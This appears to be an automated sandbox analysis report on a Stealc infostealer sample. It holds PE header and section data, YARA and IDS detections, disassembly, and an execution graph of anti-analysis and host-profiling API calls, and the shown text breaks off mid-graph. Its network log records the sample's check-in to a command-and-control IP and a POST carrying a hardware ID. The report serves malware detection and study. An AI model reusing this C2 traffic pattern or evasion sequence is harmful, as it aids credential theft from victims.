                          add byte ptr [esi], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ecx], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          pop es
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Rich Headers

                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x2b0.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          0x10000x2490000x16200845b7f129b92cec093068cf5ea49b416unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x24a0000x2b00x2000982bf1242e7dc34c5f7de596364df1eFalse0.8046875data6.003198976861589IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          0x24c0000x2b80000x200ee2dd58886394acff47748e4dd674303unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          dfcaugdi0x5040000x1a50000x1a4600a3db77b76b4a6b2308908749cef5879cFalse0.9950350087347606data7.955038828119067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          yusrdzyr0x6a90000x10000x40043ca948415449866eb99a4b90d48b98cFalse0.7900390625data6.139861983591IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant0x6aa0000x30000x2200c22742a50cfcbe403918160dee7f4d44False0.06295955882352941DOS executable (COM)0.8300390263402608IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_MANIFEST0x6a83700x256ASCII text, with CRLF line terminators0.5100334448160535

                          Imports

                          DLLImport
                          kernel32.dlllstrcpy

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-11-24T05:11:17.649446+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649714185.215.113.20680TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Nov 24, 2024 05:11:15.674479008 CET4971480192.168.2.6185.215.113.206
                          Nov 24, 2024 05:11:15.793982029 CET8049714185.215.113.206192.168.2.6
                          Nov 24, 2024 05:11:15.794112921 CET4971480192.168.2.6185.215.113.206
                          Nov 24, 2024 05:11:15.794790030 CET4971480192.168.2.6185.215.113.206
                          Nov 24, 2024 05:11:15.914218903 CET8049714185.215.113.206192.168.2.6
                          Nov 24, 2024 05:11:17.187326908 CET8049714185.215.113.206192.168.2.6
                          Nov 24, 2024 05:11:17.187395096 CET4971480192.168.2.6185.215.113.206
                          Nov 24, 2024 05:11:17.191276073 CET4971480192.168.2.6185.215.113.206
                          Nov 24, 2024 05:11:17.310805082 CET8049714185.215.113.206192.168.2.6
                          Nov 24, 2024 05:11:17.649386883 CET8049714185.215.113.206192.168.2.6
                          Nov 24, 2024 05:11:17.649446011 CET4971480192.168.2.6185.215.113.206
                          Nov 24, 2024 05:11:20.787826061 CET4971480192.168.2.6185.215.113.206

                          HTTP Request Dependency Graph

                          • 185.215.113.206

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.649714185.215.113.206802664C:\Users\user\Desktop\file.exe
                          TimestampBytes transferredDirectionData
                          Nov 24, 2024 05:11:15.794790030 CET90OUTGET / HTTP/1.1
                          Host: 185.215.113.206
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Nov 24, 2024 05:11:17.187326908 CET203INHTTP/1.1 200 OK
                          Date: Sun, 24 Nov 2024 04:11:16 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Nov 24, 2024 05:11:17.191276073 CET412OUTPOST /c4becf79229cb002.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGC
                          Host: 185.215.113.206
                          Content-Length: 210
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Data Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 41 38 35 46 39 43 46 41 36 33 37 34 38 31 34 30 37 33 31 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 2d 2d 0d 0a
                          Data Ascii: ------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="hwid"A8A85F9CFA63748140731------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="build"mars------FCGIJDBAFCBAAKECGDGC--
                          Nov 24, 2024 05:11:17.649386883 CET210INHTTP/1.1 200 OK
                          Date: Sun, 24 Nov 2024 04:11:17 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 8
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 59 6d 78 76 59 32 73 3d
                          Data Ascii: YmxvY2s=


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          System Behavior

                          General

                          Target ID:1
                          Start time:23:11:11
                          Start date:23/11/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0x430000
                          File size:1'827'840 bytes
                          MD5 hash:358F03C97356F147BACBFE66DB998B47
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.2210616498.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:4.8%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:16.3%
                            Total number of Nodes:1405
                            Total number of Limit Nodes:28
                            execution_graph 27261 448615 49 API calls 27234 453cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27275 4533c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27223 44e049 147 API calls 27276 448615 48 API calls 27235 452cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27224 452853 lstrcpy 27247 443959 244 API calls 27251 4401d9 126 API calls 27248 452d60 11 API calls 27262 452b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27263 45a280 __CxxFrameHandler 27225 435869 57 API calls 27254 441269 408 API calls 27226 444c77 296 API calls 25786 451bf0 25838 432a90 25786->25838 25790 451c03 25791 451c29 lstrcpy 25790->25791 25792 451c35 25790->25792 25791->25792 25793 451c65 ExitProcess 25792->25793 25794 451c6d GetSystemInfo 25792->25794 25795 451c85 25794->25795 25796 451c7d ExitProcess 25794->25796 25939 431030 GetCurrentProcess VirtualAllocExNuma 25795->25939 25801 451ca2 25802 451cb8 25801->25802 25803 451cb0 ExitProcess 25801->25803 25951 452ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 25802->25951 25805 451ce7 lstrlen 25810 451cff 25805->25810 25806 451cbd 25806->25805 26160 452a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25806->26160 25808 451cd1 25808->25805 25813 451ce0 ExitProcess 25808->25813 25809 451d23 lstrlen 25811 451d39 25809->25811 25810->25809 25812 451d13 lstrcpy lstrcat 25810->25812 25814 451d5a 25811->25814 25815 451d46 lstrcpy lstrcat 25811->25815 25812->25809 25816 452ad0 3 API calls 25814->25816 25815->25814 25817 451d5f lstrlen 25816->25817 25820 451d74 25817->25820 25818 451d9a lstrlen 25819 451db0 25818->25819 25822 451dce 25819->25822 25823 451dba lstrcpy lstrcat 25819->25823 25820->25818 25821 451d87 lstrcpy lstrcat 25820->25821 25821->25818 25953 452a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25822->25953 25823->25822 25825 451dd3 lstrlen 25826 451de7 25825->25826 25827 451df7 lstrcpy lstrcat 25826->25827 25828 451e0a 25826->25828 25827->25828 25829 451e28 lstrcpy 25828->25829 25830 451e30 25828->25830 25829->25830 25831 451e56 OpenEventA 25830->25831 25832 451e8c CreateEventA 25831->25832 25833 451e68 CloseHandle Sleep OpenEventA 25831->25833 25954 451b20 GetSystemTime 25832->25954 25833->25832 25833->25833 25837 451ea5 CloseHandle ExitProcess 26161 434a60 25838->26161 25840 432aa1 25841 434a60 2 API calls 25840->25841 25842 432ab7 25841->25842 25843 434a60 2 API calls 25842->25843 25844 432acd 25843->25844 25845 434a60 2 API calls 25844->25845 25846 432ae3 25845->25846 25847 434a60 2 API calls 25846->25847 25848 432af9 25847->25848 25849 434a60 2 API calls 25848->25849 25850 432b0f 25849->25850 25851 434a60 2 API calls 25850->25851 25852 432b28 25851->25852 25853 434a60 2 API calls 25852->25853 25854 432b3e 25853->25854 25855 434a60 2 API calls 25854->25855 25856 432b54 25855->25856 25857 434a60 2 API calls 25856->25857 25858 432b6a 25857->25858 25859 434a60 2 API calls 25858->25859 25860 432b80 25859->25860 25861 434a60 2 API calls 25860->25861 25862 432b96 25861->25862 25863 434a60 2 API calls 25862->25863 25864 432baf 25863->25864 25865 434a60 2 API calls 25864->25865 25866 432bc5 25865->25866 25867 434a60 2 API calls 25866->25867 25868 432bdb 25867->25868 25869 434a60 2 API calls 25868->25869 25870 432bf1 25869->25870 25871 434a60 2 API calls 25870->25871 25872 432c07 25871->25872 25873 434a60 2 API calls 25872->25873 25874 432c1d 25873->25874 25875 434a60 2 API calls 25874->25875 25876 432c36 25875->25876 25877 434a60 2 API calls 25876->25877 25878 432c4c 25877->25878 25879 434a60 2 API calls 25878->25879 25880 432c62 25879->25880 25881 434a60 2 API calls 25880->25881 25882 432c78 25881->25882 25883 434a60 2 API calls 25882->25883 25884 432c8e 25883->25884 25885 434a60 2 API calls 25884->25885 25886 432ca4 25885->25886 25887 434a60 2 API calls 25886->25887 25888 432cbd 25887->25888 25889 434a60 2 API calls 25888->25889 25890 432cd3 25889->25890 25891 434a60 2 API calls 25890->25891 25892 432ce9 25891->25892 25893 434a60 2 API calls 25892->25893 25894 432cff 25893->25894 25895 434a60 2 API calls 25894->25895 25896 432d15 25895->25896 25897 434a60 2 API calls 25896->25897 25898 432d2b 25897->25898 25899 434a60 2 API calls 25898->25899 25900 432d44 25899->25900 25901 434a60 2 API calls 25900->25901 25902 432d5a 25901->25902 25903 434a60 2 API calls 25902->25903 25904 432d70 25903->25904 25905 434a60 2 API calls 25904->25905 25906 432d86 25905->25906 25907 434a60 2 API calls 25906->25907 25908 432d9c 25907->25908 25909 434a60 2 API calls 25908->25909 25910 432db2 25909->25910 25911 434a60 2 API calls 25910->25911 25912 432dcb 25911->25912 25913 434a60 2 API calls 25912->25913 25914 432de1 25913->25914 25915 434a60 2 API calls 25914->25915 25916 432df7 25915->25916 25917 434a60 2 API calls 25916->25917 25918 432e0d 25917->25918 25919 434a60 2 API calls 25918->25919 25920 432e23 25919->25920 25921 434a60 2 API calls 25920->25921 25922 432e39 25921->25922 25923 434a60 2 API calls 25922->25923 25924 432e52 25923->25924 25925 456390 GetPEB 25924->25925 25926 4565c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 25925->25926 25929 4563c3 25925->25929 25927 456625 GetProcAddress 25926->25927 25928 456638 25926->25928 25927->25928 25930 456641 GetProcAddress GetProcAddress 25928->25930 25931 45666c 25928->25931 25934 4563d7 20 API calls 25929->25934 25930->25931 25932 456675 GetProcAddress 25931->25932 25933 456688 25931->25933 25932->25933 25935 4566a4 25933->25935 25936 456691 GetProcAddress 25933->25936 25934->25926 25937 4566d7 25935->25937 25938 4566ad GetProcAddress GetProcAddress 25935->25938 25936->25935 25937->25790 25938->25937 25940 431057 ExitProcess 25939->25940 25941 43105e VirtualAlloc 25939->25941 25942 43107d 25941->25942 25943 4310b1 25942->25943 25944 43108a VirtualFree 25942->25944 25945 4310c0 25943->25945 25944->25943 25946 4310d0 GlobalMemoryStatusEx 25945->25946 25948 431112 ExitProcess 25946->25948 25949 4310f5 25946->25949 25949->25948 25950 43111a GetUserDefaultLangID 25949->25950 25950->25801 25950->25802 25952 452b24 25951->25952 25952->25806 25953->25825 26166 451820 25954->26166 25956 451b81 sscanf 26205 432a20 25956->26205 25959 451bd6 25960 451be9 25959->25960 25961 451be2 ExitProcess 25959->25961 25962 44ffd0 25960->25962 25963 44ffe0 25962->25963 25964 45000d lstrcpy 25963->25964 25965 450019 lstrlen 25963->25965 25964->25965 25966 4500d0 25965->25966 25967 4500e7 lstrlen 25966->25967 25968 4500db lstrcpy 25966->25968 25969 4500ff 25967->25969 25968->25967 25970 450116 lstrlen 25969->25970 25971 45010a lstrcpy 25969->25971 25972 45012e 25970->25972 25971->25970 25973 450145 25972->25973 25974 450139 lstrcpy 25972->25974 26207 451570 25973->26207 25974->25973 25977 45016e 25978 450183 lstrcpy 25977->25978 25979 45018f lstrlen 25977->25979 25978->25979 25980 4501a8 25979->25980 25981 4501bd lstrcpy 25980->25981 25982 4501c9 lstrlen 25980->25982 25981->25982 25983 4501e8 25982->25983 25984 450200 lstrcpy 25983->25984 25985 45020c lstrlen 25983->25985 25984->25985 25986 45026a 25985->25986 25987 450282 lstrcpy 25986->25987 25988 45028e 25986->25988 25987->25988 26217 432e70 25988->26217 25996 450540 25997 451570 4 API calls 25996->25997 25998 45054f 25997->25998 25999 4505a1 lstrlen 25998->25999 26000 450599 lstrcpy 25998->26000 26001 4505bf 25999->26001 26000->25999 26002 4505d1 lstrcpy lstrcat 26001->26002 26003 4505e9 26001->26003 26002->26003 26004 450614 26003->26004 26005 45060c lstrcpy 26003->26005 26006 45061b lstrlen 26004->26006 26005->26004 26007 450636 26006->26007 26008 45064a lstrcpy lstrcat 26007->26008 26009 450662 26007->26009 26008->26009 26010 450687 26009->26010 26011 45067f lstrcpy 26009->26011 26012 45068e lstrlen 26010->26012 26011->26010 26013 4506b3 26012->26013 26014 4506c7 lstrcpy lstrcat 26013->26014 26015 4506db 26013->26015 26014->26015 26016 450704 lstrcpy 26015->26016 26017 45070c 26015->26017 26016->26017 26018 450751 26017->26018 26019 450749 lstrcpy 26017->26019 26973 452740 GetWindowsDirectoryA 26018->26973 26019->26018 26021 450785 26982 434c50 26021->26982 26022 45075d 26022->26021 26023 45077d lstrcpy 26022->26023 26023->26021 26025 45078f 27136 448ca0 StrCmpCA 26025->27136 26027 45079b 26028 431530 8 API calls 26027->26028 26029 4507bc 26028->26029 26030 4507e5 lstrcpy 26029->26030 26031 4507ed 26029->26031 26030->26031 27154 4360d0 80 API calls 26031->27154 26033 4507fa 27155 4481b0 10 API calls 26033->27155 26035 450809 26036 431530 8 API calls 26035->26036 26037 45082f 26036->26037 26038 450856 lstrcpy 26037->26038 26039 45085e 26037->26039 26038->26039 27156 4360d0 80 API calls 26039->27156 26041 45086b 27157 447ee0 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 26041->27157 26043 450876 26044 431530 8 API calls 26043->26044 26045 4508a1 26044->26045 26046 4508d5 26045->26046 26047 4508c9 lstrcpy 26045->26047 27158 4360d0 80 API calls 26046->27158 26047->26046 26049 4508db 27159 448050 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 26049->27159 26051 4508e6 26052 431530 8 API calls 26051->26052 26053 4508f7 26052->26053 26054 450926 lstrcpy 26053->26054 26055 45092e 26053->26055 26054->26055 27160 435640 8 API calls 26055->27160 26057 450933 26058 431530 8 API calls 26057->26058 26059 45094c 26058->26059 27161 447280 1500 API calls 26059->27161 26061 45099f 26062 431530 8 API calls 26061->26062 26063 4509cf 26062->26063 26064 4509f6 lstrcpy 26063->26064 26065 4509fe 26063->26065 26064->26065 27162 4360d0 80 API calls 26065->27162 26067 450a0b 27163 4483e0 7 API calls 26067->27163 26069 450a18 26070 431530 8 API calls 26069->26070 26071 450a29 26070->26071 27164 4324e0 230 API calls 26071->27164 26073 450a6b 26074 450b40 26073->26074 26075 450a7f 26073->26075 26077 431530 8 API calls 26074->26077 26076 431530 8 API calls 26075->26076 26078 450aa5 26076->26078 26079 450b59 26077->26079 26081 450ad4 26078->26081 26082 450acc lstrcpy 26078->26082 26080 450b87 26079->26080 26083 450b7f lstrcpy 26079->26083 27168 4360d0 80 API calls 26080->27168 27165 4360d0 80 API calls 26081->27165 26082->26081 26083->26080 26086 450b8d 27169 44c840 70 API calls 26086->27169 26087 450ada 27166 4485b0 47 API calls 26087->27166 26090 450b38 26093 450bd1 26090->26093 26096 431530 8 API calls 26090->26096 26091 450ae5 26092 431530 8 API calls 26091->26092 26095 450af6 26092->26095 26094 450bfa 26093->26094 26098 431530 8 API calls 26093->26098 26099 450c23 26094->26099 26104 431530 8 API calls 26094->26104 27167 44d0f0 118 API calls 26095->27167 26097 450bb9 26096->26097 27170 44d7b0 104 API calls 26097->27170 26103 450bf5 26098->26103 26102 450c4c 26099->26102 26107 431530 8 API calls 26099->26107 26108 450c75 26102->26108 26114 431530 8 API calls 26102->26114 27172 44dfa0 149 API calls 26103->27172 26105 450c1e 26104->26105 27173 44e500 108 API calls 26105->27173 26106 450bbe 26112 431530 8 API calls 26106->26112 26113 450c47 26107->26113 26110 450c9e 26108->26110 26115 431530 8 API calls 26108->26115 26117 450cc7 26110->26117 26122 431530 8 API calls 26110->26122 26116 450bcc 26112->26116 27174 44e720 120 API calls 26113->27174 26119 450c70 26114->26119 26120 450c99 26115->26120 27171 44ecb0 99 API calls 26116->27171 26123 450cf0 26117->26123 26129 431530 8 API calls 26117->26129 27175 44e9e0 110 API calls 26119->27175 27176 437bc0 153 API calls 26120->27176 26128 450cc2 26122->26128 26125 450d04 26123->26125 26126 450dca 26123->26126 26130 431530 8 API calls 26125->26130 26131 431530 8 API calls 26126->26131 27177 44eb70 108 API calls 26128->27177 26133 450ceb 26129->26133 26135 450d2a 26130->26135 26137 450de3 26131->26137 27178 4541e0 91 API calls 26133->27178 26138 450d56 lstrcpy 26135->26138 26139 450d5e 26135->26139 26136 450e11 27182 4360d0 80 API calls 26136->27182 26137->26136 26140 450e09 lstrcpy 26137->26140 26138->26139 27179 4360d0 80 API calls 26139->27179 26140->26136 26143 450e17 27183 44c840 70 API calls 26143->27183 26144 450d64 27180 4485b0 47 API calls 26144->27180 26147 450dc2 26150 431530 8 API calls 26147->26150 26148 450d6f 26149 431530 8 API calls 26148->26149 26151 450d80 26149->26151 26154 450e39 26150->26154 27181 44d0f0 118 API calls 26151->27181 26153 450e67 27184 4360d0 80 API calls 26153->27184 26154->26153 26155 450e5f lstrcpy 26154->26155 26155->26153 26157 450e74 26159 450e95 26157->26159 27185 451660 12 API calls 26157->27185 26159->25837 26160->25808 26162 434a76 RtlAllocateHeap 26161->26162 26165 434ab4 VirtualProtect 26162->26165 26165->25840 26167 45182e 26166->26167 26168 451855 lstrlen 26167->26168 26169 451849 lstrcpy 26167->26169 26170 451873 26168->26170 26169->26168 26171 451885 lstrcpy lstrcat 26170->26171 26172 451898 26170->26172 26171->26172 26173 4518c7 26172->26173 26174 4518bf lstrcpy 26172->26174 26175 4518ce lstrlen 26173->26175 26174->26173 26176 4518e6 26175->26176 26177 4518f2 lstrcpy lstrcat 26176->26177 26178 451906 26176->26178 26177->26178 26179 451935 26178->26179 26180 45192d lstrcpy 26178->26180 26181 45193c lstrlen 26179->26181 26180->26179 26182 451958 26181->26182 26183 45196a lstrcpy lstrcat 26182->26183 26184 45197d 26182->26184 26183->26184 26185 4519ac 26184->26185 26186 4519a4 lstrcpy 26184->26186 26187 4519b3 lstrlen 26185->26187 26186->26185 26188 4519cb 26187->26188 26189 4519d7 lstrcpy lstrcat 26188->26189 26190 4519eb 26188->26190 26189->26190 26191 451a1a 26190->26191 26192 451a12 lstrcpy 26190->26192 26193 451a21 lstrlen 26191->26193 26192->26191 26194 451a3d 26193->26194 26195 451a4f lstrcpy lstrcat 26194->26195 26196 451a62 26194->26196 26195->26196 26197 451a91 26196->26197 26198 451a89 lstrcpy 26196->26198 26199 451a98 lstrlen 26197->26199 26198->26197 26200 451ab4 26199->26200 26201 451ac6 lstrcpy lstrcat 26200->26201 26202 451ad9 26200->26202 26201->26202 26203 451b08 26202->26203 26204 451b00 lstrcpy 26202->26204 26203->25956 26204->26203 26206 432a24 SystemTimeToFileTime SystemTimeToFileTime 26205->26206 26206->25959 26206->25960 26208 45157f 26207->26208 26209 45159f lstrcpy 26208->26209 26210 4515a7 26208->26210 26209->26210 26211 4515d7 lstrcpy 26210->26211 26212 4515df 26210->26212 26211->26212 26213 45160f lstrcpy 26212->26213 26214 451617 26212->26214 26213->26214 26215 450155 lstrlen 26214->26215 26216 451647 lstrcpy 26214->26216 26215->25977 26216->26215 26218 434a60 2 API calls 26217->26218 26219 432e82 26218->26219 26220 434a60 2 API calls 26219->26220 26221 432ea0 26220->26221 26222 434a60 2 API calls 26221->26222 26223 432eb6 26222->26223 26224 434a60 2 API calls 26223->26224 26225 432ecb 26224->26225 26226 434a60 2 API calls 26225->26226 26227 432eec 26226->26227 26228 434a60 2 API calls 26227->26228 26229 432f01 26228->26229 26230 434a60 2 API calls 26229->26230 26231 432f19 26230->26231 26232 434a60 2 API calls 26231->26232 26233 432f3a 26232->26233 26234 434a60 2 API calls 26233->26234 26235 432f4f 26234->26235 26236 434a60 2 API calls 26235->26236 26237 432f65 26236->26237 26238 434a60 2 API calls 26237->26238 26239 432f7b 26238->26239 26240 434a60 2 API calls 26239->26240 26241 432f91 26240->26241 26242 434a60 2 API calls 26241->26242 26243 432faa 26242->26243 26244 434a60 2 API calls 26243->26244 26245 432fc0 26244->26245 26246 434a60 2 API calls 26245->26246 26247 432fd6 26246->26247 26248 434a60 2 API calls 26247->26248 26249 432fec 26248->26249 26250 434a60 2 API calls 26249->26250 26251 433002 26250->26251 26252 434a60 2 API calls 26251->26252 26253 433018 26252->26253 26254 434a60 2 API calls 26253->26254 26255 433031 26254->26255 26256 434a60 2 API calls 26255->26256 26257 433047 26256->26257 26258 434a60 2 API calls 26257->26258 26259 43305d 26258->26259 26260 434a60 2 API calls 26259->26260 26261 433073 26260->26261 26262 434a60 2 API calls 26261->26262 26263 433089 26262->26263 26264 434a60 2 API calls 26263->26264 26265 43309f 26264->26265 26266 434a60 2 API calls 26265->26266 26267 4330b8 26266->26267 26268 434a60 2 API calls 26267->26268 26269 4330ce 26268->26269 26270 434a60 2 API calls 26269->26270 26271 4330e4 26270->26271 26272 434a60 2 API calls 26271->26272 26273 4330fa 26272->26273 26274 434a60 2 API calls 26273->26274 26275 433110 26274->26275 26276 434a60 2 API calls 26275->26276 26277 433126 26276->26277 26278 434a60 2 API calls 26277->26278 26279 43313f 26278->26279 26280 434a60 2 API calls 26279->26280 26281 433155 26280->26281 26282 434a60 2 API calls 26281->26282 26283 43316b 26282->26283 26284 434a60 2 API calls 26283->26284 26285 433181 26284->26285 26286 434a60 2 API calls 26285->26286 26287 433197 26286->26287 26288 434a60 2 API calls 26287->26288 26289 4331ad 26288->26289 26290 434a60 2 API calls 26289->26290 26291 4331c6 26290->26291 26292 434a60 2 API calls 26291->26292 26293 4331dc 26292->26293 26294 434a60 2 API calls 26293->26294 26295 4331f2 26294->26295 26296 434a60 2 API calls 26295->26296 26297 433208 26296->26297 26298 434a60 2 API calls 26297->26298 26299 43321e 26298->26299 26300 434a60 2 API calls 26299->26300 26301 433234 26300->26301 26302 434a60 2 API calls 26301->26302 26303 43324d 26302->26303 26304 434a60 2 API calls 26303->26304 26305 433263 26304->26305 26306 434a60 2 API calls 26305->26306 26307 433279 26306->26307 26308 434a60 2 API calls 26307->26308 26309 43328f 26308->26309 26310 434a60 2 API calls 26309->26310 26311 4332a5 26310->26311 26312 434a60 2 API calls 26311->26312 26313 4332bb 26312->26313 26314 434a60 2 API calls 26313->26314 26315 4332d4 26314->26315 26316 434a60 2 API calls 26315->26316 26317 4332ea 26316->26317 26318 434a60 2 API calls 26317->26318 26319 433300 26318->26319 26320 434a60 2 API calls 26319->26320 26321 433316 26320->26321 26322 434a60 2 API calls 26321->26322 26323 43332c 26322->26323 26324 434a60 2 API calls 26323->26324 26325 433342 26324->26325 26326 434a60 2 API calls 26325->26326 26327 43335b 26326->26327 26328 434a60 2 API calls 26327->26328 26329 433371 26328->26329 26330 434a60 2 API calls 26329->26330 26331 433387 26330->26331 26332 434a60 2 API calls 26331->26332 26333 43339d 26332->26333 26334 434a60 2 API calls 26333->26334 26335 4333b3 26334->26335 26336 434a60 2 API calls 26335->26336 26337 4333c9 26336->26337 26338 434a60 2 API calls 